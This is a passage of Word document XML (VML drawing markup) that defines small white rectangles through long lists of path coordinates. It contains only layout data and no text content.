3257,11775,3260,11775,3263,11775,3266,11775,3266,11775,3266,11775,3266,11775,3266,11775,3266,11775,3266,11775,3266,11775,3266,11775,3266,11775,3266,11775,3266,11775,3266,11775,3266,11775,3266,11775,3266,11775,3266,11775,3266,11776,3266,11776,3266,11776,3266,11776,3266,11776,3266,11776,3266,11777,3266,11777,3266,11777,3266,11777,3266,11778,3266,11778,3266,11778,3266,11779,3266,11779,3266,11779,3266,11780,3266,11780,3266,11781,3266,11781,3266,11782,3266,11783,3266,11783,3266,11784,3266,11785,3266,11785,3266,11786,3266,11787,3266,11788,3266,11789,3266,11790,3266,11791,3266,11792,3266,11793,3266,11794,3266,11795,3266,11796,3266,11797,3266,11799,3266,11800,3266,11802,3266,11803,3266,11804,3266,11806,3266,11808,3266,11809,3266,11811,3266,11813,3266,11815,3266,11817,3266,11818,3266,11820,3266,11823,3266,11825,3266,11827,3266,11829,3266,11831,3266,11834,3266,11836,3266,11839,3266,11841,3266,11844,3266,11847,3266,11850,3266,11852,3266,11855,3266,11858,3266,11862,3266,11865,3266,11868,3266,11871,3266,11875,3266,11878,3266,11882,3266,11885,3266,11889,3266,11893,3266,11897,3266,11901,3266,11905,3266,11909,3266,11913,3266,11917,3266,11922,3266,11926,3266,11931,3266,11936,3266,11940,3266,11945,3266,11950,3266,11955,3266,11960,3266,11966,3266,11971,3266,11976,3266,11982,3266,11988,3266,11993,3266,11999,3266,12005,3266,12011,3266,12017,3266,12024,3266,12030,3266,12030,3266,12030,3266,12030,3266,12030,3266,12030,3266,12030,3266,12030,3266,12030,3266,12030,3266,12030,3266,12030,3266,12030,3266,12030,3265,12030,3265,12030,3265,12030,3265,12030,3265,12030,3265,12030,3265,12030,3265,12030,3265,12030,3265,12030,3265,12030,3265,12030,3265,12030,3264,12030,3264,12030,3264,12030,3264,12030,3264,12030,3264,12030,3263,12030,3263,12030,3263,12030,3263,12030,3262,12030,3262,12030,3262,12030,3261,12030,3261,12030,3261,12030,3260,12030,3260,12030,3260,12030,3259,12030,3259,12030,3258,12030,3258,12030,3257,12030,3257,12030,3256,12030,3256,12030,3255,12030,3254,12030,3254,12030,3253,12030,3252,12030,3252,12030,3251,12030,3250,12030,3249,12030,3249,12030,3248,12030,3247,12030,3246,12030,3245,12030,3244,12030,3243,12030,3242,12030,3241,12030,3240,12030,3239,12030,3238,12030,3237,12030,3236,12030,3234,12030,3233,12030,3232,12030,3231,12030,3229,12030,3228,12030,3226,12030,3225,12030,3223,12030,3222,12030,3220,12030,3219,12030,3217,12030,3215,12030,3214,12030,3212,12030,3210,12030,3208,12030,3206,12030,3205,12030,3203,12030,3201,12030,3199,12030,3197,12030,3194,12030,3192,12030,3190,12030,3188,12030,3186,12030,3183,12030,3181,12030,3178,12030,3176,12030,3173,12030,3171,12030,3168,12030,3166,12030,3163,12030,3160,12030,3157,12030,3154,12030,3152,12030,3149,12030,3146,12030,3146,12030,3146,12030,3146,12030,3146,12030,3146,12030,3146,12030,3146,12030,3146,12030,3146,12030,3146,12030,3146,12030,3146,12030,3146,12030,3146,12030,3146,12030,3146,12030,3146,12029,3146,12029,3146,12029,3146,12029,3146,12029,3146,12029,3146,12028,3146,12028,3146,12028,3146,12028,3146,12027,3146,12027,3146,12027,3146,12026,3146,12026,3146,12026,3146,12025,3146,12025,3146,12024,3146,12024,3146,12023,3146,12022,3146,12022,3146,12021,3146,12020,3146,12020,3146,12019,3146,12018,3146,12017,3146,12016,3146,12015,3146,12014,3146,12013,3146,12012,3146,12011,3146,12010,3146,12009,3146,12008,3146,12006,3146,12005,3146,12003,3146,12002,3146,12001,3146,11999,3146,11997,3146,11996,3146,11994,3146,11992,3146,11990,3146,11988,3146,11987,3146,11985,3146,11982,3146,11980,3146,11978,3146,11976,3146,11974,3146,11971,3146,11969,3146,11966,3146,11964,3146,11961,3146,11958,3146,11955,3146,11953,3146,11950,3146,11947,3146,11943,3146,11940,3146,11937,3146,11934,3146,11930,3146,11927,3146,11923,3146,11920,3146,11916,3146,11912,3146,11908,3146,11904,3146,11900,3146,11896,3146,11892,3146,11888,3146,11883,3146,11879,3146,11874,3146,11869,3146,11865,3146,11860,3146,11855,3146,11850,3146,11845,3146,11839,3146,11834,3146,11829,3146,11823,3146,11817,3146,11812,3146,11806,3146,11800,3146,11794,3146,11788,3146,11781,3146,11775e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:174.500pt;margin-top:606.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3490,12130" coordsize="130,270">
        <v:shape style="position:absolute;left:3490;top:12130;width:130;height:270" coordorigin="3490,12130" coordsize="130,270" path="m3506,12150l3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3506,12150,3507,12150,3507,12150,3507,12150,3507,12150,3507,12150,3507,12150,3507,12150,3508,12150,3508,12150,3508,12150,3508,12150,3508,12150,3509,12150,3509,12150,3509,12150,3509,12150,3510,12150,3510,12150,3510,12150,3511,12150,3511,12150,3511,12150,3512,12150,3512,12150,3513,12150,3513,12150,3514,12150,3514,12150,3515,12150,3515,12150,3516,12150,3516,12150,3517,12150,3518,12150,3518,12150,3519,12150,3520,12150,3520,12150,3521,12150,3522,12150,3523,12150,3524,12150,3524,12150,3525,12150,3526,12150,3527,12150,3528,12150,3529,12150,3530,12150,3531,12150,3532,12150,3533,12150,3535,12150,3536,12150,3537,12150,3538,12150,3540,12150,3541,12150,3542,12150,3544,12150,3545,12150,3547,12150,3548,12150,3550,12150,3551,12150,3553,12150,3554,12150,3556,12150,3558,12150,3559,12150,3561,12150,3563,12150,3565,12150,3567,12150,3569,12150,3571,12150,3573,12150,3575,12150,3577,12150,3579,12150,3581,12150,3584,12150,3586,12150,3588,12150,3591,12150,3593,12150,3596,12150,3598,12150,3601,12150,3603,12150,3606,12150,3609,12150,3611,12150,3614,12150,3617,12150,3620,12150,3623,12150,3626,12150,3626,12150,3626,12150,3626,12150,3626,12150,3626,12150,3626,12150,3626,12150,3626,12150,3626,12150,3626,12150,3626,12150,3626,12150,3626,12150,3626,12150,3626,12151,3626,12151,3626,12151,3626,12151,3626,12151,3626,12151,3626,12151,3626,12152,3626,12152,3626,12152,3626,12152,3626,12152,3626,12153,3626,12153,3626,12153,3626,12154,3626,12154,3626,12155,3626,12155,3626,12156,3626,12156,3626,12157,3626,12157,3626,12158,3626,12158,3626,12159,3626,12160,3626,12161,3626,12161,3626,12162,3626,12163,3626,12164,3626,12165,3626,12166,3626,12167,3626,12168,3626,12169,3626,12170,3626,12171,3626,12173,3626,12174,3626,12175,3626,12177,3626,12178,3626,12180,3626,12181,3626,12183,3626,12184,3626,12186,3626,12188,3626,12190,3626,12192,3626,12194,3626,12196,3626,12198,3626,12200,3626,12202,3626,12204,3626,12207,3626,12209,3626,12211,3626,12214,3626,12217,3626,12219,3626,12222,3626,12225,3626,12228,3626,12231,3626,12234,3626,12237,3626,12240,3626,12243,3626,12246,3626,12250,3626,12253,3626,12257,3626,12260,3626,12264,3626,12268,3626,12272,3626,12276,3626,12280,3626,12284,3626,12288,3626,12293,3626,12297,3626,12302,3626,12306,3626,12311,3626,12316,3626,12320,3626,12325,3626,12330,3626,12336,3626,12341,3626,12346,3626,12352,3626,12357,3626,12363,3626,12369,3626,12374,3626,12380,3626,12386,3626,12393,3626,12399,3626,12405,3626,12405,3626,12405,3626,12405,3626,12405,3626,12405,3626,12405,3626,12405,3626,12405,3626,12405,3626,12405,3626,12405,3626,12405,3626,12405,3626,12405,3626,12405,3626,12405,3626,12405,3625,12405,3625,12405,3625,12405,3625,12405,3625,12405,3625,12405,3625,12405,3625,12405,3625,12405,3625,12405,3624,12405,3624,12405,3624,12405,3624,12405,3624,12405,3623,12405,3623,12405,3623,12405,3623,12405,3623,12405,3622,12405,3622,12405,3622,12405,3621,12405,3621,12405,3621,12405,3620,12405,3620,12405,3619,12405,3619,12405,3618,12405,3618,12405,3617,12405,3617,12405,3616,12405,3616,12405,3615,12405,3615,12405,3614,12405,3613,12405,3613,12405,3612,12405,3611,12405,3610,12405,3610,12405,3609,12405,3608,12405,3607,12405,3606,12405,3605,12405,3604,12405,3603,12405,3602,12405,3601,12405,3600,12405,3599,12405,3598,12405,3597,12405,3596,12405,3595,12405,3593,12405,3592,12405,3591,12405,3589,12405,3588,12405,3587,12405,3585,12405,3584,12405,3582,12405,3581,12405,3579,12405,3577,12405,3576,12405,3574,12405,3572,12405,3570,12405,3569,12405,3567,12405,3565,12405,3563,12405,3561,12405,3559,12405,3557,12405,3555,12405,3552,12405,3550,12405,3548,12405,3546,12405,3543,12405,3541,12405,3539,12405,3536,12405,3534,12405,3531,12405,3528,12405,3526,12405,3523,12405,3520,12405,3517,12405,3515,12405,3512,12405,3509,12405,3506,12405,3506,12405,3506,12405,3506,12405,3506,12405,3506,12405,3506,12405,3506,12405,3506,12405,3506,12405,3506,12405,3506,12405,3506,12405,3506,12405,3506,12405,3506,12405,3506,12405,3506,12405,3506,12405,3506,12404,3506,12404,3506,12404,3506,12404,3506,12404,3506,12403,3506,12403,3506,12403,3506,12403,3506,12402,3506,12402,3506,12402,3506,12401,3506,12401,3506,12400,3506,12400,3506,12399,3506,12399,3506,12398,3506,12398,3506,12397,3506,12396,3506,12396,3506,12395,3506,12394,3506,12393,3506,12392,3506,12391,3506,12391,3506,12390,3506,12389,3506,12387,3506,12386,3506,12385,3506,12384,3506,12383,3506,12381,3506,12380,3506,12379,3506,12377,3506,12376,3506,12374,3506,12373,3506,12371,3506,12369,3506,12367,3506,12366,3506,12364,3506,12362,3506,12360,3506,12358,3506,12356,3506,12353,3506,12351,3506,12349,3506,12346,3506,12344,3506,12341,3506,12339,3506,12336,3506,12333,3506,12331,3506,12328,3506,12325,3506,12322,3506,12319,3506,12316,3506,12312,3506,12309,3506,12306,3506,12302,3506,12299,3506,12295,3506,12291,3506,12287,3506,12283,3506,12280,3506,12275,3506,12271,3506,12267,3506,12263,3506,12258,3506,12254,3506,12249,3506,12245,3506,12240,3506,12235,3506,12230,3506,12225,3506,12220,3506,12215,3506,12209,3506,12204,3506,12198,3506,12193,3506,12187,3506,12181,3506,12175,3506,12169,3506,12163,3506,12157,3506,12150e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:624.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,12490" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:12490;width:130;height:270" coordorigin="3010,12490" coordsize="130,270" path="m3026,12510l3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3026,12510,3027,12510,3027,12510,3027,12510,3027,12510,3027,12510,3027,12510,3027,12510,3028,12510,3028,12510,3028,12510,3028,12510,3029,12510,3029,12510,3029,12510,3029,12510,3030,12510,3030,12510,3030,12510,3031,12510,3031,12510,3032,12510,3032,12510,3032,12510,3033,12510,3033,12510,3034,12510,3034,12510,3035,12510,3036,12510,3036,12510,3037,12510,3037,12510,3038,12510,3039,12510,3039,12510,3040,12510,3041,12510,3042,12510,3043,12510,3043,12510,3044,12510,3045,12510,3046,12510,3047,12510,3048,12510,3049,12510,3050,12510,3051,12510,3052,12510,3053,12510,3054,12510,3056,12510,3057,12510,3058,12510,3059,12510,3061,12510,3062,12510,3063,12510,3065,12510,3066,12510,3068,12510,3069,12510,3071,12510,3072,12510,3074,12510,3076,12510,3077,12510,3079,12510,3081,12510,3083,12510,3085,12510,3087,12510,3089,12510,3091,12510,3093,12510,3095,12510,3097,12510,3099,12510,3101,12510,3103,12510,3106,12510,3108,12510,3110,12510,3113,12510,3115,12510,3118,12510,3120,12510,3123,12510,3126,12510,3128,12510,3131,12510,3134,12510,3137,12510,3140,12510,3143,12510,3146,12510,3146,12510,3146,12510,3146,12510,3146,12510,3146,12510,3146,12510,3146,12510,3146,12510,3146,12510,3146,12510,3146,12510,3146,12511,3146,12511,3146,12511,3146,12511,3146,12511,3146,12511,3146,12511,3146,12511,3146,12511,3146,12512,3146,12512,3146,12512,3146,12512,3146,12512,3146,12513,3146,12513,3146,12513,3146,12514,3146,12514,3146,12514,3146,12515,3146,12515,3146,12516,3146,12516,3146,12517,3146,12517,3146,12518,3146,12519,3146,12519,3146,12520,3146,12521,3146,12522,3146,12522,3146,12523,3146,12524,3146,12525,3146,12526,3146,12527,3146,12528,3146,12529,3146,12530,3146,12532,3146,12533,3146,12534,3146,12535,3146,12537,3146,12538,3146,12540,3146,12541,3146,12543,3146,12545,3146,12546,3146,12548,3146,12550,3146,12552,3146,12554,3146,12556,3146,12558,3146,12560,3146,12562,3146,12564,3146,12567,3146,12569,3146,12572,3146,12574,3146,12577,3146,12579,3146,12582,3146,12585,3146,12588,3146,12591,3146,12594,3146,12597,3146,12600,3146,12603,3146,12607,3146,12610,3146,12613,3146,12617,3146,12621,3146,12624,3146,12628,3146,12632,3146,12636,3146,12640,3146,12644,3146,12648,3146,12653,3146,12657,3146,12662,3146,12666,3146,12671,3146,12676,3146,12681,3146,12686,3146,12691,3146,12696,3146,12701,3146,12706,3146,12712,3146,12717,3146,12723,3146,12729,3146,12735,3146,12741,3146,12747,3146,12753,3146,12759,3146,12765,3146,12765,3146,12765,3146,12765,3146,12765,3146,12765,3146,12765,3146,12765,3146,12765,3146,12765,3146,12765,3146,12765,3145,12765,3145,12765,3145,12765,3145,12765,3145,12765,3145,12765,3145,12765,3145,12765,3145,12765,3145,12765,3145,12765,3145,12765,3145,12765,3145,12765,3144,12765,3144,12765,3144,12765,3144,12765,3144,12765,3144,12765,3143,12765,3143,12765,3143,12765,3143,12765,3143,12765,3142,12765,3142,12765,3142,12765,3141,12765,3141,12765,3141,12765,3140,12765,3140,12765,3140,12765,3139,12765,3139,12765,3138,12765,3138,12765,3137,12765,3137,12765,3136,12765,3136,12765,3135,12765,3134,12765,3134,12765,3133,12765,3132,12765,3132,12765,3131,12765,3130,12765,3129,12765,3129,12765,3128,12765,3127,12765,3126,12765,3125,12765,3124,12765,3123,12765,3122,12765,3121,12765,3120,12765,3119,12765,3118,12765,3117,12765,3116,12765,3114,12765,3113,12765,3112,12765,3110,12765,3109,12765,3108,12765,3106,12765,3105,12765,3103,12765,3102,12765,3100,12765,3099,12765,3097,12765,3095,12765,3094,12765,3092,12765,3090,12765,3088,12765,3086,12765,3084,12765,3083,12765,3081,12765,3079,12765,3076,12765,3074,12765,3072,12765,3070,12765,3068,12765,3065,12765,3063,12765,3061,12765,3058,12765,3056,12765,3053,12765,3051,12765,3048,12765,3045,12765,3043,12765,3040,12765,3037,12765,3034,12765,3031,12765,3029,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12765,3026,12764,3026,12764,3026,12764,3026,12764,3026,12764,3026,12763,3026,12763,3026,12763,3026,12762,3026,12762,3026,12762,3026,12761,3026,12761,3026,12760,3026,12760,3026,12759,3026,12759,3026,12758,3026,12758,3026,12757,3026,12756,3026,12756,3026,12755,3026,12754,3026,12753,3026,12753,3026,12752,3026,12751,3026,12750,3026,12749,3026,12748,3026,12747,3026,12745,3026,12744,3026,12743,3026,12742,3026,12740,3026,12739,3026,12737,3026,12736,3026,12734,3026,12733,3026,12731,3026,12729,3026,12728,3026,12726,3026,12724,3026,12722,3026,12720,3026,12718,3026,12716,3026,12714,3026,12711,3026,12709,3026,12707,3026,12704,3026,12702,3026,12699,3026,12696,3026,12694,3026,12691,3026,12688,3026,12685,3026,12682,3026,12679,3026,12676,3026,12672,3026,12669,3026,12666,3026,12662,3026,12659,3026,12655,3026,12651,3026,12648,3026,12644,3026,12640,3026,12636,3026,12631,3026,12627,3026,12623,3026,12619,3026,12614,3026,12609,3026,12605,3026,12600,3026,12595,3026,12590,3026,12585,3026,12580,3026,12575,3026,12569,3026,12564,3026,12558,3026,12553,3026,12547,3026,12541,3026,12535,3026,12529,3026,12523,3026,12517,3026,12510e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:192.500pt;margin-top:643.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3850,12870" coordsize="130,270">
        <v:shape style="position:absolute;left:3850;top:12870;width:130;height:270" coordorigin="3850,12870" coordsize="130,270" path="m3866,12885l3866,12885,3866,12885,3866,12885,3866,12885,3866,12885,3866,12885,3866,12885,3866,12885,3866,12885,3866,12885,3866,12885,3866,12885,3866,12885,3866,12885,3866,12885,3866,12885,3866,12885,3866,12885,3866,12885,3866,12885,3867,12885,3867,12885,3867,12885,3867,12885,3867,12885,3867,12885,3867,12885,3867,12885,3868,12885,3868,12885,3868,12885,3868,12885,3868,12885,3869,12885,3869,12885,3869,12885,3869,12885,3870,12885,3870,12885,3870,12885,3871,12885,3871,12885,3871,12885,3872,12885,3872,12885,3872,12885,3873,12885,3873,12885,3874,12885,3874,12885,3875,12885,3875,12885,3876,12885,3877,12885,3877,12885,3878,12885,3878,12885,3879,12885,3880,12885,3881,12885,3881,12885,3882,12885,3883,12885,3884,12885,3885,12885,3886,12885,3886,12885,3887,12885,3888,12885,3889,12885,3890,12885,3891,12885,3893,12885,3894,12885,3895,12885,3896,12885,3897,12885,3898,12885,3900,12885,3901,12885,3902,12885,3904,12885,3905,12885,3907,12885,3908,12885,3910,12885,3911,12885,3913,12885,3914,12885,3916,12885,3918,12885,3920,12885,3921,12885,3923,12885,3925,12885,3927,12885,3929,12885,3931,12885,3933,12885,3935,12885,3937,12885,3939,12885,3942,12885,3944,12885,3946,12885,3948,12885,3951,12885,3953,12885,3956,12885,3958,12885,3961,12885,3963,12885,3966,12885,3969,12885,3972,12885,3974,12885,3977,12885,3980,12885,3983,12885,3986,12885,3986,12885,3986,12885,3986,12885,3986,12885,3986,12886,3986,12886,3986,12886,3986,12886,3986,12886,3986,12886,3986,12886,3986,12886,3986,12886,3986,12886,3986,12886,3986,12886,3986,12886,3986,12886,3986,12886,3986,12887,3986,12887,3986,12887,3986,12887,3986,12887,3986,12888,3986,12888,3986,12888,3986,12888,3986,12889,3986,12889,3986,12890,3986,12890,3986,12890,3986,12891,3986,12891,3986,12892,3986,12893,3986,12893,3986,12894,3986,12894,3986,12895,3986,12896,3986,12897,3986,12898,3986,12898,3986,12899,3986,12900,3986,12901,3986,12902,3986,12903,3986,12904,3986,12906,3986,12907,3986,12908,3986,12909,3986,12911,3986,12912,3986,12914,3986,12915,3986,12917,3986,12918,3986,12920,3986,12922,3986,12923,3986,12925,3986,12927,3986,12929,3986,12931,3986,12933,3986,12935,3986,12937,3986,12940,3986,12942,3986,12944,3986,12947,3986,12949,3986,12952,3986,12955,3986,12957,3986,12960,3986,12963,3986,12966,3986,12969,3986,12972,3986,12975,3986,12978,3986,12982,3986,12985,3986,12989,3986,12992,3986,12996,3986,13000,3986,13003,3986,13007,3986,13011,3986,13015,3986,13019,3986,13024,3986,13028,3986,13032,3986,13037,3986,13041,3986,13046,3986,13051,3986,13056,3986,13061,3986,13066,3986,13071,3986,13076,3986,13082,3986,13087,3986,13093,3986,13098,3986,13104,3986,13110,3986,13116,3986,13122,3986,13128,3986,13134,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3986,13141,3985,13141,3985,13141,3985,13141,3985,13141,3985,13141,3985,13141,3985,13141,3985,13141,3984,13141,3984,13141,3984,13141,3984,13141,3984,13141,3983,13141,3983,13141,3983,13141,3983,13141,3982,13141,3982,13141,3982,13141,3981,13141,3981,13141,3981,13141,3980,13141,3980,13141,3980,13141,3979,13141,3979,13141,3978,13141,3978,13141,3977,13141,3977,13141,3976,13141,3975,13141,3975,13141,3974,13141,3973,13141,3973,13141,3972,13141,3971,13141,3971,13141,3970,13141,3969,13141,3968,13141,3967,13141,3966,13141,3966,13141,3965,13141,3964,13141,3963,13141,3962,13141,3961,13141,3959,13141,3958,13141,3957,13141,3956,13141,3955,13141,3953,13141,3952,13141,3951,13141,3950,13141,3948,13141,3947,13141,3945,13141,3944,13141,3942,13141,3941,13141,3939,13141,3937,13141,3936,13141,3934,13141,3932,13141,3931,13141,3929,13141,3927,13141,3925,13141,3923,13141,3921,13141,3919,13141,3917,13141,3915,13141,3913,13141,3910,13141,3908,13141,3906,13141,3904,13141,3901,13141,3899,13141,3896,13141,3894,13141,3891,13141,3889,13141,3886,13141,3883,13141,3880,13141,3878,13141,3875,13141,3872,13141,3869,13141,3866,13141,3866,13141,3866,13141,3866,13141,3866,13141,3866,13141,3866,13141,3866,13141,3866,13141,3866,13141,3866,13141,3866,13140,3866,13140,3866,13140,3866,13140,3866,13140,3866,13140,3866,13140,3866,13140,3866,13140,3866,13140,3866,13139,3866,13139,3866,13139,3866,13139,3866,13139,3866,13138,3866,13138,3866,13138,3866,13137,3866,13137,3866,13137,3866,13136,3866,13136,3866,13135,3866,13135,3866,13134,3866,13134,3866,13133,3866,13132,3866,13132,3866,13131,3866,13130,3866,13129,3866,13129,3866,13128,3866,13127,3866,13126,3866,13125,3866,13124,3866,13123,3866,13122,3866,13121,3866,13119,3866,13118,3866,13117,3866,13115,3866,13114,3866,13113,3866,13111,3866,13110,3866,13108,3866,13106,3866,13105,3866,13103,3866,13101,3866,13099,3866,13097,3866,13095,3866,13093,3866,13091,3866,13089,3866,13086,3866,13084,3866,13082,3866,13079,3866,13077,3866,13074,3866,13072,3866,13069,3866,13066,3866,13063,3866,13060,3866,13057,3866,13054,3866,13051,3866,13048,3866,13044,3866,13041,3866,13037,3866,13034,3866,13030,3866,13027,3866,13023,3866,13019,3866,13015,3866,13011,3866,13007,3866,13002,3866,12998,3866,12994,3866,12989,3866,12985,3866,12980,3866,12975,3866,12970,3866,12965,3866,12960,3866,12955,3866,12950,3866,12945,3866,12939,3866,12934,3866,12928,3866,12922,3866,12916,3866,12910,3866,12904,3866,12898,3866,12892,3866,12885e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:674.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,13490" coordsize="130,270">
        <v:shape style="position:absolute;left:2530;top:13490;width:130;height:270" coordorigin="2530,13490" coordsize="130,270" path="m2545,13516l2545,13516,2545,13516,2545,13516,2545,13516,2545,13516,2545,13516,2545,13516,2545,13516,2545,13516,2545,13516,2545,13516,2545,13516,2545,13516,2545,13516,2545,13516,2546,13516,2546,13516,2546,13516,2546,13516,2546,13516,2546,13516,2546,13516,2546,13516,2546,13516,2546,13516,2546,13516,2547,13516,2547,13516,2547,13516,2547,13516,2547,13516,2547,13516,2548,13516,2548,13516,2548,13516,2548,13516,2549,13516,2549,13516,2549,13516,2550,13516,2550,13516,2550,13516,2551,13516,2551,13516,2551,13516,2552,13516,2552,13516,2553,13516,2553,13516,2554,13516,2554,13516,2555,13516,2555,13516,2556,13516,2556,13516,2557,13516,2558,13516,2558,13516,2559,13516,2560,13516,2561,13516,2561,13516,2562,13516,2563,13516,2564,13516,2565,13516,2566,13516,2567,13516,2568,13516,2569,13516,2570,13516,2571,13516,2572,13516,2573,13516,2574,13516,2575,13516,2577,13516,2578,13516,2579,13516,2580,13516,2582,13516,2583,13516,2585,13516,2586,13516,2588,13516,2589,13516,2591,13516,2592,13516,2594,13516,2596,13516,2597,13516,2599,13516,2601,13516,2603,13516,2604,13516,2606,13516,2608,13516,2610,13516,2612,13516,2614,13516,2617,13516,2619,13516,2621,13516,2623,13516,2625,13516,2628,13516,2630,13516,2633,13516,2635,13516,2638,13516,2640,13516,2643,13516,2645,13516,2648,13516,2651,13516,2654,13516,2656,13516,2659,13516,2662,13516,2665,13516,2665,13516,2665,13516,2665,13516,2665,13516,2665,13516,2665,13516,2665,13516,2665,13516,2665,13516,2665,13516,2665,13516,2665,13516,2665,13516,2665,13516,2665,13516,2665,13516,2665,13516,2665,13517,2665,13517,2665,13517,2665,13517,2665,13517,2665,13517,2665,13518,2665,13518,2665,13518,2665,13518,2665,13519,2665,13519,2665,13520,2665,13520,2665,13520,2665,13521,2665,13521,2665,13522,2665,13522,2665,13523,2665,13523,2665,13524,2665,13525,2665,13526,2665,13526,2665,13527,2665,13528,2665,13529,2665,13530,2665,13531,2665,13532,2665,13533,2665,13534,2665,13535,2665,13536,2665,13537,2665,13538,2665,13540,2665,13541,2665,13542,2665,13544,2665,13545,2665,13547,2665,13549,2665,13550,2665,13552,2665,13554,2665,13555,2665,13557,2665,13559,2665,13561,2665,13563,2665,13566,2665,13568,2665,13570,2665,13572,2665,13575,2665,13577,2665,13580,2665,13582,2665,13585,2665,13588,2665,13590,2665,13593,2665,13596,2665,13599,2665,13602,2665,13606,2665,13609,2665,13612,2665,13616,2665,13619,2665,13623,2665,13626,2665,13630,2665,13634,2665,13638,2665,13642,2665,13646,2665,13650,2665,13654,2665,13658,2665,13663,2665,13667,2665,13672,2665,13676,2665,13681,2665,13686,2665,13691,2665,13696,2665,13701,2665,13707,2665,13712,2665,13717,2665,13723,2665,13729,2665,13734,2665,13740,2665,13746,2665,13752,2665,13758,2665,13765,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2665,13771,2664,13771,2664,13771,2664,13771,2664,13771,2664,13771,2664,13771,2664,13771,2663,13771,2663,13771,2663,13771,2663,13771,2663,13771,2662,13771,2662,13771,2662,13771,2661,13771,2661,13771,2661,13771,2660,13771,2660,13771,2660,13771,2659,13771,2659,13771,2658,13771,2658,13771,2657,13771,2657,13771,2656,13771,2656,13771,2655,13771,2655,13771,2654,13771,2653,13771,2653,13771,2652,13771,2651,13771,2651,13771,2650,13771,2649,13771,2648,13771,2648,13771,2647,13771,2646,13771,2645,13771,2644,13771,2643,13771,2642,13771,2641,13771,2640,13771,2639,13771,2638,13771,2636,13771,2635,13771,2634,13771,2633,13771,2632,13771,2630,13771,2629,13771,2627,13771,2626,13771,2625,13771,2623,13771,2622,13771,2620,13771,2618,13771,2617,13771,2615,13771,2613,13771,2612,13771,2610,13771,2608,13771,2606,13771,2604,13771,2602,13771,2600,13771,2598,13771,2596,13771,2594,13771,2592,13771,2590,13771,2587,13771,2585,13771,2583,13771,2580,13771,2578,13771,2576,13771,2573,13771,2571,13771,2568,13771,2565,13771,2563,13771,2560,13771,2557,13771,2554,13771,2551,13771,2548,13771,2545,13771,2545,13771,2545,13771,2545,13771,2545,13771,2545,13771,2545,13771,2545,13771,2545,13771,2545,13771,2545,13771,2545,13771,2545,13771,2545,13771,2545,13771,2545,13771,2545,13770,2545,13770,2545,13770,2545,13770,2545,13770,2545,13770,2545,13770,2545,13769,2545,13769,2545,13769,2545,13769,2545,13768,2545,13768,2545,13768,2545,13767,2545,13767,2545,13766,2545,13766,2545,13765,2545,13765,2545,13764,2545,13764,2545,13763,2545,13763,2545,13762,2545,13761,2545,13761,2545,13760,2545,13759,2545,13758,2545,13757,2545,13756,2545,13755,2545,13754,2545,13753,2545,13752,2545,13751,2545,13750,2545,13748,2545,13747,2545,13746,2545,13744,2545,13743,2545,13741,2545,13740,2545,13738,2545,13737,2545,13735,2545,13733,2545,13731,2545,13729,2545,13727,2545,13725,2545,13723,2545,13721,2545,13719,2545,13717,2545,13714,2545,13712,2545,13710,2545,13707,2545,13704,2545,13702,2545,13699,2545,13696,2545,13693,2545,13690,2545,13687,2545,13684,2545,13681,2545,13678,2545,13675,2545,13671,2545,13668,2545,13664,2545,13661,2545,13657,2545,13653,2545,13649,2545,13645,2545,13641,2545,13637,2545,13633,2545,13628,2545,13624,2545,13620,2545,13615,2545,13610,2545,13606,2545,13601,2545,13596,2545,13591,2545,13585,2545,13580,2545,13575,2545,13569,2545,13564,2545,13558,2545,13552,2545,13547,2545,13541,2545,13535,2545,13528,2545,13522,2545,13516e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:693.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,13870" coordsize="130,270">
